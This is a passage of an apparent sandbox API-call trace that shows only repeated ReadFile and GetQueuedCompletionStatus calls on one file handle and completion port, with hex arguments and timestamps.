dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.351] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.351] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.351] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.351] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.352] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.352] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.352] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.352] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.352] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.352] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.352] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.352] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.352] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.352] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.352] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.352] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.352] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.352] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.352] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.352] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.352] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.352] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.353] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.353] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.353] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.353] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.353] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.353] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.356] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.356] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.356] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.356] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.356] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.356] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.356] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.357] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.357] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.357] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.357] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.357] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.357] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.357] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.357] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.357] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.357] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.357] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.357] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.357] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.357] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.357] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.357] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.357] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.358] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.358] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.358] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.358] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.358] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.358] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.358] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.358] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.358] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.358] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.358] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.358] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.358] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.358] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.358] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.358] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.358] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.358] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.359] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.359] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.359] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.359] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.359] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.359] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.359] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.359] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.359] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.359] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.359] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.359] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.359] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.359] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.359] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.359] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.359] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.360] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.360] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.360] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.360] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.360] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.360] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.360] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.360] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.360] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.360] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.360] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.360] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.360] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, 